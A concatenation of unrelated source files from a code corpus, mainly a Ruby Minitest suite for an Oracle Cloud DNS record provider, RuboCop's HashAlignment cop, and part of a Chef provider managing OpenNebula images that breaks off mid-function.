app 'DEVONthink.app'
end
| 40 | 113 | 0.801563 |
d5f5b7eb7e03e70501ca3cc48379cd56fa0c3b1e | 24,401 | require 'test_helper'
class OracleCloudDNSTest < Minitest::Test
def setup
super
@zone_name = 'test.recordstore.io'
@oracle_cloud_dns = Provider::OracleCloudDNS
end
def test_zones
VCR.use_cassette('oracle_get_zones') do
zones = @oracle_cloud_dns.zones
assert_includes(zones, @zone_name)
end
end
def test_add_changeset
record = Record::A.new(fqdn: 'test_add_changeset.test.recordstore.io', ttl: 600, address: '10.10.10.42')
VCR.use_cassette('oracle_add_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
end
end
def test_add_multiple_changesets
records = [
Record::A.new(fqdn: 'test_add_multiple_changesets.test.recordstore.io', ttl: 1200, address: '10.10.10.65'),
Record::A.new(fqdn: 'test_add_multiple_changesets.test.recordstore.io', ttl: 1200, address: '10.10.10.70'),
]
VCR.use_cassette('oracle_add_multiple_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
end
end
def test_add_same_two_txt_but_only_one_stores_changesets
records = [
Record::TXT.new(fqdn: 'test_add_same_two_txt_changesets.test.recordstore.io', ttl: 1200, txtdata: 'same text'),
Record::TXT.new(fqdn: 'test_add_same_two_txt_changesets.test.recordstore.io', ttl: 1200, txtdata: 'same text'),
]
VCR.use_cassette('oracle_add_same_two_txt_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = [] << current_records.any? do |current_record|
current_record.is_a?(Record::TXT) &&
records[0].fqdn == current_record.fqdn &&
records[0].ttl == current_record.ttl &&
records[0].txtdata == current_record.txtdata
end
assert(contains_desired_record.length == 1)
end
end
def test_add_changeset_with_nil_zone
record = Record::A.new(
fqdn: 'test_add_changeset_with_nil_zone.test.recordstore.io',
ttl: 600,
address: '10.10.10.42'
)
VCR.use_cassette('oracle_add_changeset_nil_zone') do
assert_raises(RuntimeError) do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: nil
))
end
end
end
def test_add_changset_missing_zone
record = Record::A.new(
fqdn: 'test_add_changset_missing_zone.test.recordstore.io',
ttl: 2400, address: '10.10.10.80'
)
VCR.use_cassette('oracle_add_changeset_missing_zone') do
assert_raises do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
# Maintainers Note: Ensure that the `recordstore.io` zone does not exist
zone: 'test_add_changset_missing_zone.recordstore.io'
))
end
end
end
def test_remove_changeset
record = Record::A.new(fqdn: 'test_remove_changeset.test.recordstore.io', ttl: 600, address: '10.10.10.42')
VCR.use_cassette('oracle_remove_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.none? do |current_record|
current_record.is_a?(Record::A) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.address == current_record.address
end
assert(contains_desired_record)
end
end
def test_remove_does_not_exist_changeset
record = Record::A.new(
fqdn: 'test_remove_does_not_exist_changeset.test.recordstore.io',
ttl: 600,
address: '10.10.10.99'
)
VCR.use_cassette('oracle_remove_does_not_exist_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.none? do |current_record|
current_record.is_a?(Record::A) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.address == current_record.address
end
assert(contains_desired_record)
end
end
def test_remove_first_from_two_a_records_changeset
records = [
Record::A.new(
fqdn: 'test_remove_first_from_two_a_records_changeset.test.recordstore.io',
ttl: 600,
address: '60.60.60.66'
),
Record::A.new(
fqdn: 'test_remove_first_from_two_a_records_changeset.test.recordstore.io',
ttl: 600,
address: '70.70.70.77'
),
]
VCR.use_cassette('oracle_remove_first_from_two_a_records_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: records,
desired_records: [records[1]],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::A) &&
records[1].fqdn == current_record.fqdn &&
records[1].ttl == current_record.ttl &&
records[1].address == current_record.address
end
assert(contains_desired_record)
end
end
def test_remove_first_from_two_txt_records_changeset
records = [
Record::TXT.new(
fqdn: 'test_remove_first_from_two_txt_records_changeset.test.recordstore.io',
ttl: 600,
txtdata: 'text 1'
),
Record::TXT.new(
fqdn: 'test_remove_first_from_two_txt_records_changeset.test.recordstore.io',
ttl: 600,
txtdata: 'text 2'
),
]
VCR.use_cassette('oracle_remove_first_from_two_txt_records_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: records,
desired_records: [records[1]],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::TXT) &&
records[1].fqdn == current_record.fqdn &&
records[1].ttl == current_record.ttl &&
records[1].txtdata == current_record.txtdata
end
assert(contains_desired_record)
end
end
def test_remove_second_from_two_txt_records_changeset
records = [
Record::TXT.new(
fqdn: 'test_remove_second_from_two_txt_records_changeset.test.recordstore.io',
ttl: 1200,
txtdata: 'text 1'
),
Record::TXT.new(
fqdn: 'test_remove_second_from_two_txt_records_changeset.test.recordstore.io',
ttl: 1200,
txtdata: 'text 2'
),
]
VCR.use_cassette('oracle_remove_second_from_two_txt_records_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: records,
desired_records: [records[0]],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::TXT) &&
records[0].fqdn == current_record.fqdn &&
records[0].ttl == current_record.ttl &&
records[0].txtdata == current_record.txtdata
end
assert(contains_desired_record)
end
end
def test_record_retrieved_after_adding_record_changeset
record = Record::A.new(fqdn: 'test_add_a.test.recordstore.io', ttl: 600, address: '10.10.10.1')
VCR.use_cassette('oracle_add_a_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::A) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.address == current_record.address
end
assert(contains_desired_record)
end
end
def test_alias_record_retrieved_after_adding_record_changeset
record = Record::ALIAS.new(fqdn: 'test_add_alias.test.recordstore.io', ttl: 600, alias: 'recordstore.com')
VCR.use_cassette('oracle_add_alias_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::ALIAS) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.alias == current_record.alias
end
assert(contains_desired_record)
end
end
def test_caa_record_retrieved_after_adding_record_changeset
record = Record::CAA.new(
fqdn: 'test_add_caa.test.recordstore.io',
ttl: 600,
flags: 0,
tag: 'issue',
value: 'shopify.com'
)
VCR.use_cassette('oracle_add_caa_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::CAA) &&
record.flags == current_record.flags &&
record.tag == current_record.tag &&
record.value == current_record.value
end
assert(contains_desired_record)
end
end
def test_cname_record_retrieved_after_adding_record_changeset
record = Record::CNAME.new(fqdn: 'test_add_cname.test.recordstore.io.', ttl: 600, cname: 'test.recordstore.io.')
VCR.use_cassette('oracle_add_cname_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::CNAME) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.cname == current_record.cname
end
assert(contains_desired_record)
end
end
def test_mx_record_retrieved_after_adding_record_changeset
record = Record::MX.new(
fqdn: 'test_add_mx.test.recordstore.io',
ttl: 600,
preference: 10,
exchange: 'mxa.mailgun.org'
)
VCR.use_cassette('oracle_add_mx_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::MX) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.preference == current_record.preference &&
record.exchange == current_record.exchange
end
assert(contains_desired_record)
end
end
def test_ns_record_retrieved_after_adding_record_changeset
record = Record::NS.new(
fqdn: 'test_add_ns.test.recordstore.io.',
ttl: 600,
nsdname: 'ns_test.p68.dns.oraclecloud.net.'
)
VCR.use_cassette('oracle_add_ns_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::NS) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.nsdname == current_record.nsdname
end
assert(contains_desired_record)
end
end
# If there's space in txtdata, it stores separately with double quotes
def test_txt_record_retrieved_after_adding_record_changeset
record = Record::TXT.new(fqdn: 'test_add_txt.test.recordstore.io.', ttl: 600, txtdata: 'Hello World!')
VCR.use_cassette('oracle_add_txt_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::TXT) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.txtdata == current_record.txtdata
end
assert(contains_desired_record)
end
end
def test_spf_record_retrieved_after_adding_record_changeset
record = Record::SPF.new(fqdn: 'test_add_spf.test.recordstore.io.', ttl: 600, txtdata: 'Hello World!')
VCR.use_cassette('oracle_add_spf_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::SPF) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.txtdata == current_record.txtdata
end
assert(contains_desired_record)
end
end
def test_srv_record_retrieved_after_adding_record_changeset
record = Record::SRV.new(
fqdn: 'test_add_spf.test.recordstore.io.',
ttl: 600,
priority: 1,
weight: 2,
port: 3,
target: 'spf.shopify.com.'
)
VCR.use_cassette('oracle_add_srv_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::SRV) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.priority == current_record.priority &&
record.weight == current_record.weight &&
record.port == current_record.port &&
record.target == current_record.target
end
assert(contains_desired_record)
end
end
def test_update_changeset
VCR.use_cassette('oracle_update_changeset') do
record_data = {
address: '10.10.10.48',
fqdn: 'test_update_changeset.test.recordstore.io',
ttl: 600,
}
# Create a record
record = Record::A.new(record_data)
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
# Retrieve it
record = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name).select { |r| r == record }.first
assert(!record.nil?)
updated_record = Record::A.new(record_data)
updated_record.address = "10.10.10.49"
# Try to update it
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [updated_record],
provider: @oracle_cloud_dns,
zone: @zone_name,
))
updated_record_exists = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).any? { |r| r == updated_record }
old_record_does_not_exist = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).none? { |r| r == record }
assert(updated_record_exists)
assert(old_record_does_not_exist)
end
end
def test_updating_record_ttl
VCR.use_cassette('oracle_updating_record_ttl') do
record_data = { fqdn: 'test_updating_ttl.test.recordstore.io', ttl: 600, address: '10.10.10.1' }
record = Record::A.new(record_data)
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
record_with_updated_ttl = Record::A.new(record_data.merge(ttl: 10))
record = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name).select { |r| r == record }.first
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [record_with_updated_ttl],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_updated_record = current_records.any? { |r| r == record_with_updated_ttl }
assert(contains_updated_record)
end
end
def test_update_changeset_where_domain_doesnt_exist
VCR.use_cassette('oracle_update_changeset_where_domain_doesnt_exist') do
record_data = {
address: '10.10.10.48',
fqdn: 'test_update_changeset_where_domain_doesnt_exist.test.recordstore.io',
ttl: 600,
}
# Create a record
record = Record::A.new(record_data)
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
# Retrieve it
record = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name).select { |r| r == record }.first
assert(!record.nil?)
updated_record = Record::A.new(record_data)
updated_record.address = "10.10.10.49"
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [],
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [updated_record],
provider: @oracle_cloud_dns,
zone: @zone_name,
))
end
end
def test_update_changeset_for_fqdn_with_multiple_answers
VCR.use_cassette('oracle_update_changeset_for_fqdn_with_multiple_answers') do
base_record_data = {
fqdn: 'test_update_changeset_multiples.test.recordstore.io',
ttl: 600,
}
record_datas = [
base_record_data.merge(address: '10.10.10.47'),
base_record_data.merge(address: '10.10.10.48'),
base_record_data.merge(address: '10.10.10.49'),
]
# Create records
original_records = record_datas.map do |record_data|
Record::A.new(record_data)
end
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: original_records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
# Retrieve them
records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
updated_record = Record::A.new(record_datas.first)
updated_record.address = "10.10.10.50"
# Modify the first record we added
updated_records = records.map do |record|
if record == original_records.first
updated_record
else
record
end
end
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: records,
desired_records: updated_records,
provider: @oracle_cloud_dns,
zone: @zone_name,
))
# Check
updated_record_exists = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).any? { |r| r == updated_record }
first_record_does_not_exist = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
.none? { |r| r == original_records[0] }
second_record_exists = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).any? { |r| r == original_records[1] }
third_record_exists = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).any? { |r| r == original_records[2] }
assert(updated_record_exists)
assert(first_record_does_not_exist)
assert(second_record_exists)
assert(third_record_exists)
end
end
def test_remove_record_should_not_remove_all_records_for_fqdn
record_1 = Record::A.new(fqdn: 'one_of_these_should_remain.test.recordstore.io', ttl: 600, address: '20.20.20.20')
record_2 = Record::A.new(fqdn: 'one_of_these_should_remain.test.recordstore.io', ttl: 600, address: '30.30.30.30')
VCR.use_cassette('oracle_remove_record_should_not_remove_all_records_for_fqdn') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record_1, record_2],
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record_1, record_2],
desired_records: [record_1],
provider: @oracle_cloud_dns,
zone: @zone_name
))
records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
record_2_missing = records.none? do |current_record|
current_record.is_a?(Record::A) &&
record_2.fqdn == current_record.fqdn &&
record_2.ttl == current_record.ttl &&
record_2.address == current_record.address
end
record_1_found = records.any? do |current_record|
current_record.is_a?(Record::A) &&
record_1.fqdn == current_record.fqdn &&
record_1.ttl == current_record.ttl &&
record_1.address == current_record.address
end
assert(record_2_missing, "expected deleted record to be absent in Oracle")
assert(record_1_found, "expected record that was not removed to be present in Oracle")
end
end
end
| 33.243869 | 118 | 0.66821 |
e2548909426b43e25cbc165c1d408ba38ff3fc1e | 9,960 | # frozen_string_literal: true
module RuboCop
module Cop
module Layout
# Check that the keys, separators, and values of a multi-line hash
# literal are aligned according to configuration. The configuration
# options are:
#
# * key (left align keys, one space before hash rockets and values)
# * separator (align hash rockets and colons, right align keys)
# * table (left align keys, hash rockets, and values)
#
# The treatment of hashes passed as the last argument to a method call
# can also be configured. The options are:
#
# * always_inspect
# * always_ignore
# * ignore_implicit (without curly braces)
#
# Alternatively you can specify multiple allowed styles. That's done by
# passing a list of styles to EnforcedStyles.
#
# @example EnforcedHashRocketStyle: key (default)
# # bad
# {
# :foo => bar,
# :ba => baz
# }
# {
# :foo => bar,
# :ba => baz
# }
#
# # good
# {
# :foo => bar,
# :ba => baz
# }
#
# @example EnforcedHashRocketStyle: separator
# # bad
# {
# :foo => bar,
# :ba => baz
# }
# {
# :foo => bar,
# :ba => baz
# }
#
# # good
# {
# :foo => bar,
# :ba => baz
# }
#
# @example EnforcedHashRocketStyle: table
# # bad
# {
# :foo => bar,
# :ba => baz
# }
#
# # good
# {
# :foo => bar,
# :ba => baz
# }
#
# @example EnforcedColonStyle: key (default)
# # bad
# {
# foo: bar,
# ba: baz
# }
# {
# foo: bar,
# ba: baz
# }
#
# # good
# {
# foo: bar,
# ba: baz
# }
#
# @example EnforcedColonStyle: separator
# # bad
# {
# foo: bar,
# ba: baz
# }
#
# # good
# {
# foo: bar,
# ba: baz
# }
#
# @example EnforcedColonStyle: table
# # bad
# {
# foo: bar,
# ba: baz
# }
#
# # good
# {
# foo: bar,
# ba: baz
# }
#
# @example EnforcedLastArgumentHashStyle: always_inspect (default)
# # Inspect both implicit and explicit hashes.
#
# # bad
# do_something(foo: 1,
# bar: 2)
#
# # bad
# do_something({foo: 1,
# bar: 2})
#
# # good
# do_something(foo: 1,
# bar: 2)
#
# # good
# do_something(
# foo: 1,
# bar: 2
# )
#
# # good
# do_something({foo: 1,
# bar: 2})
#
# # good
# do_something({
# foo: 1,
# bar: 2
# })
#
# @example EnforcedLastArgumentHashStyle: always_ignore
# # Ignore both implicit and explicit hashes.
#
# # good
# do_something(foo: 1,
# bar: 2)
#
# # good
# do_something({foo: 1,
# bar: 2})
#
# @example EnforcedLastArgumentHashStyle: ignore_implicit
# # Ignore only implicit hashes.
#
# # bad
# do_something({foo: 1,
# bar: 2})
#
# # good
# do_something(foo: 1,
# bar: 2)
#
# @example EnforcedLastArgumentHashStyle: ignore_explicit
# # Ignore only explicit hashes.
#
# # bad
# do_something(foo: 1,
# bar: 2)
#
# # good
# do_something({foo: 1,
# bar: 2})
#
class HashAlignment < Cop
include HashAlignmentStyles
include RangeHelp
MESSAGES = { KeyAlignment => 'Align the keys of a hash literal if ' \
'they span more than one line.',
SeparatorAlignment => 'Align the separators of a hash ' \
'literal if they span more than one line.',
TableAlignment => 'Align the keys and values of a hash ' \
'literal if they span more than one line.' }.freeze
def on_send(node)
return if double_splat?(node)
return unless node.arguments?
last_argument = node.last_argument
return unless last_argument.hash_type? &&
ignore_hash_argument?(last_argument)
ignore_node(last_argument)
end
alias on_super on_send
alias on_yield on_send
def on_hash(node) # rubocop:todo Metrics/CyclomaticComplexity
return if ignored_node?(node)
return if node.pairs.empty? || node.single_line?
return unless alignment_for_hash_rockets
.any? { |a| a.checkable_layout?(node) } &&
alignment_for_colons
.any? { |a| a.checkable_layout?(node) }
check_pairs(node)
end
def autocorrect(node)
delta = column_deltas[alignment_for(node).first.class][node]
return if delta.nil?
correct_node(node, delta)
end
attr_accessor :offences_by, :column_deltas
private
def reset!
self.offences_by = {}
self.column_deltas = Hash.new { |hash, key| hash[key] = {} }
end
def double_splat?(node)
node.children.last.is_a?(Symbol)
end
def check_pairs(node)
first_pair = node.pairs.first
reset!
alignment_for(first_pair).each do |alignment|
delta = alignment.deltas_for_first_pair(first_pair, node)
check_delta delta, node: first_pair, alignment: alignment
end
node.children.each do |current|
alignment_for(current).each do |alignment|
delta = alignment.deltas(first_pair, current)
check_delta delta, node: current, alignment: alignment
end
end
add_offences
end
def add_offences
format, offences = offences_by.min_by { |_, v| v.length }
(offences || []).each do |offence|
add_offense(offence, message: MESSAGES[format])
end
end
def check_delta(delta, node:, alignment:)
offences_by[alignment.class] ||= []
return if good_alignment? delta
column_deltas[alignment.class][node] = delta
offences_by[alignment.class].push(node)
end
def ignore_hash_argument?(node)
case cop_config['EnforcedLastArgumentHashStyle']
when 'always_inspect' then false
when 'always_ignore' then true
when 'ignore_explicit' then node.braces?
when 'ignore_implicit' then !node.braces?
end
end
def alignment_for(pair)
if pair.hash_rocket?
alignment_for_hash_rockets
else
alignment_for_colons
end
end
def alignment_for_hash_rockets
@alignment_for_hash_rockets ||=
new_alignment('EnforcedHashRocketStyle')
end
def alignment_for_colons
@alignment_for_colons ||=
new_alignment('EnforcedColonStyle')
end
def correct_node(node, delta)
# We can't use the instance variable inside the lambda. That would
# just give each lambda the same reference and they would all get the
# last value of each. A local variable fixes the problem.
if !node.value
correct_no_value(delta[:key] || 0, node.source_range)
else
correct_key_value(delta, node.key.source_range,
node.value.source_range,
node.loc.operator)
end
end
def correct_no_value(key_delta, key)
->(corrector) { adjust(corrector, key_delta, key) }
end
def correct_key_value(delta, key, value, separator)
# We can't use the instance variable inside the lambda. That would
# just give each lambda the same reference and they would all get the
# last value of each. Some local variables fix the problem.
separator_delta = delta[:separator] || 0
value_delta = delta[:value] || 0
key_delta = delta[:key] || 0
key_column = key.column
key_delta = -key_column if key_delta < -key_column
lambda do |corrector|
adjust(corrector, key_delta, key)
adjust(corrector, separator_delta, separator)
adjust(corrector, value_delta, value)
end
end
def new_alignment(key)
formats = cop_config[key]
formats = [formats] if formats.is_a? String
formats.uniq.map do |format|
case format
when 'key'
KeyAlignment.new
when 'table'
TableAlignment.new
when 'separator'
SeparatorAlignment.new
else
raise "Unknown #{key}: #{formats}"
end
end
end
def adjust(corrector, delta, range)
if delta.positive?
corrector.insert_before(range, ' ' * delta)
elsif delta.negative?
range = range_between(range.begin_pos - delta.abs, range.begin_pos)
corrector.remove(range)
end
end
def good_alignment?(column_deltas)
column_deltas.values.all?(&:zero?)
end
end
end
end
end
| 27.213115 | 79 | 0.5 |
383286b5ad4f90e86d0df8e9d934e12496a14ee7 | 16,788 | # Copyright 2016, BlackBerry Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Implementation of Provider class.
#
class Chef
#
# Implementation of Provider class.
#
class Provider
#
# Implementation of Provider class.
#
class OneImage < Chef::Provider::LWRPBase
use_inline_resources
provides :one_image
attr_reader :image
def whyrun_supported?
true
end
def load_current_resource
end
def action_handler
@action_handler ||= Chef::Provisioning::ChefProviderActionHandler.new(self)
end
def exists?
new_driver = driver
@image = new_driver.one.get_resource(:image, :name => @new_resource.name)
[email protected]?
end
action :allocate do
if exists?
# Image already exists, check whether we need/can update it
# OpenNebula Image example:
# ID : 14202
# NAME : ey-test
# USER : Mandolin
# GROUP : users
# DATASTORE : orn-svc01-ds
# TYPE : DATABLOCK
# REGISTER TIME : 10/19 18:16:02
# PERSISTENT : No
# SOURCE : /var/lib/one/datastores/103/743dff63f337a0192b13f2963f92d741
# FSTYPE : raw
# SIZE : 1000M
# STATE : rdy
# RUNNING_VMS : 0
#
# PERMISSIONS
# OWNER : um-
# GROUP : ---
# OTHER : ---
#
# IMAGE TEMPLATE
# DESCRIPTION="what a heck!"
# DEV_PREFIX="vd"
# DRIVER="qcow2"
# FSTYPE="ext4"
# SIZE="100"
#
# We can update many parameters and whatever we update goes into section below 'IMAGE TEMPLATE'.
# IMPORTANT: if the parameter we are updating exists above 'IMAGE TEMPLATE' then our modification has no effect.
# In other words a value for a parameter defined above wins over parameter defined below 'IMAGE TEMPLATE'.
on_image = @image.to_hash['IMAGE']
# We can update only following attributes. This is a map of one_image attributes to OpenNebula image attributes
attrs_map = { 'name' => 'NAME', 'size' => 'SIZE', 'datastore_id' => 'DATASTORE_ID', 'type' => 'TYPE', 'description' => 'DESCRIPTION', 'fs_type' => 'FSTYPE',
'img_driver' => 'DRIVER', 'prefix' => 'DEV_PREFIX', 'persistent' => 'PERSISTENT', 'mode' => 'PERMISSIONS', 'disk_type' => 'DISK_TYPE' }
# Find out what attribute needs to be updated
attrs_to_update = {}
new_resource_hash = @new_resource.to_hash # hash keys are symbols
new_resource_hash.each do |k, v|
next if v.nil? || !attrs_map.key?(k.to_s)
v = v.to_s # everything is String in what we get in OpenNebula Image info
on_attr = attrs_map[k.to_s]
# For some one_image attributes provided in new_resource we need to find respective values in ON Image
case k
when :type
image_types = %w(OS CDROM DATABLOCK KERNEL RAMDISK CONTEXT)
on_image['TYPE'] = image_types[on_image['TYPE'].to_i] # convert Image Type Id into String
when :persistent
on_image['PERSISTENT'] = (on_image['PERSISTENT'] == '1' ? 'true' : 'false')
when :mode
perm = on_image['PERMISSIONS']
perm_octet_u = perm['OWNER_U'].to_i * 4 + perm['OWNER_M'].to_i * 2 + perm['OWNER_A'].to_i
perm_octet_g = perm['GROUP_U'].to_i * 4 + perm['GROUP_M'].to_i * 2 + perm['GROUP_A'].to_i
perm_octet_o = perm['OTHER_U'].to_i * 4 + perm['OTHER_M'].to_i * 2 + perm['OTHER_A'].to_i
on_image['PERMISSIONS'] = "#{perm_octet_u}#{perm_octet_g}#{perm_octet_o}"
when :disk_type
disk_types = %w(BLOCK CDROM FILE)
on_image['DISK_TYPE'] = disk_types[on_image['DISK_TYPE'].to_i] # convert Disk Type into String
end
next if on_image.key?(on_attr) && (v == on_image[on_attr])
next if on_image['TEMPLATE'].key?(on_attr) && (new_resource_hash[k] == on_image['TEMPLATE'][on_attr])
fail "Cannot update '#{on_attr}' as it is defined above 'IMAGE TEMPLATE' section." if on_image.key?(on_attr) && !on_image[on_attr].empty? && on_attr != 'PERMISSIONS'
attrs_to_update[on_attr] = v
end
unless attrs_to_update.empty?
# Prepare template to update
img_template = ''
attrs_to_update.each do |k, v|
next if k == 'PERMISSIONS' # needs special treatment
img_template << case k
when 'SIZE', 'PERSISTENT'
"#{k} = #{v}\n"
when 'TYPE', 'DESCRIPTION', 'FSTYPE', 'DRIVER', 'DEV_PREFIX', 'DISK_TYPE'
"#{k} = \"#{v}\"\n"
end
end
# Perform actual update
description = "updated image '#{new_resource.name}'\n" + attrs_to_update.to_s
action_handler.perform_action description do
unless img_template == '' # can happen when we update only PERMISSIONS
rc = @image.update(img_template, true)
fail "failed to update image '#{new_resource.name}': #{rc.message}" if OpenNebula.is_error?(rc)
end
if attrs_to_update.key?('PERMISSIONS')
rc = @image.chmod_octet(attrs_to_update['PERMISSIONS'])
fail "failed to update image '#{new_resource.name}': #{rc.message}" if OpenNebula.is_error?(rc)
end
end
end
else
fail "'size' must be specified" unless new_resource.size
fail "'datastore_id' must be specified" unless new_resource.datastore_id
action_handler.perform_action "allocated image '#{new_resource.name}'" do
@image = new_driver.one.allocate_img(
:name => new_resource.name,
:size => new_resource.size,
